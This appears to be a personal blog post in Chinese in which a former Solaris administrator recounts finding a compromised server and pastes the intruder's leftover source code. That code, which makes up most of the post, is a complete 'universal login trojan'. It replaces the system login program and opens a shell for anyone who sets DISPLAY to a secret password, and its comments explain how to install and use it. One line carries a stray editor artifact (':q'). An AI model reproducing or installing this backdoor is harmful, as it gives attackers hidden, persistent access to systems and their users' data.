Dylan’s Workplace

以前幹Solaris網管時，公司server被駭（我進公司不到一星期發現的，應該是我進去之前就被破台很久-_-|||），駭進來的人真的有點白目，竟然編譯完login.c檔案後，替換掉正常程序後也沒把原始碼刪除掉，也因此我得以一窺究竟（雖然我還是看不懂）。

留著或許有用或許沒用，反正也是今天整理舊檔案時發現的，就貼上來給大家看看吧：

/*
* PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !! PRIVATE !!
* Universal login trojan by Tragedy/Dor
*  Email: rawpower@iname.com
*  IRC: [Dor]@ircnet
*
* Login trojan for pretty much any O/S...
* Tested on:   Linux, BSDI 2.0, FreeBSD, IRIX 6.x, 5.x, Sunos 5.5,5.6,5.7
*       OSF1/DGUX4.0,
* Known not to work on:
*  SunOS 4.x and 5.4... Seems the only variable passwd to login
*  on these versions of SunOS is the $TERM... and its passed via
*  commandline option... should be easy to work round in time
*
*   #define         PASSWORD  - Set your password here
*   #define         _PATH_LOGIN - This is where you moved the original login to
*  login to hacked host with...
*  from bourne shell (sh, bash) sh DISPLAY="your pass";export DISPLAY;telnet host
*
*/

#include        <stdio.h>
#if !defined(PASSWORD)
#define  PASSWORD "xxx"
#endif
#if !defined(_PATH_LOGIN)
# define                _PATH_LOGIN     "/dev/login"
#endif

main (argc, argv, envp):q
int argc;
char **argv, **envp;
{
char *display = getenv("DISPLAY");
if ( display == NULL ) {
      execve(_PATH_LOGIN, argv, envp);
      perror(_PATH_LOGIN);
      exit(1);
 }
if (!strcmp(display,PASSWORD)) {
              system("/bin/sh");
      exit(1);
      }

      execve(_PATH_LOGIN, argv, envp);
      exit(1);
}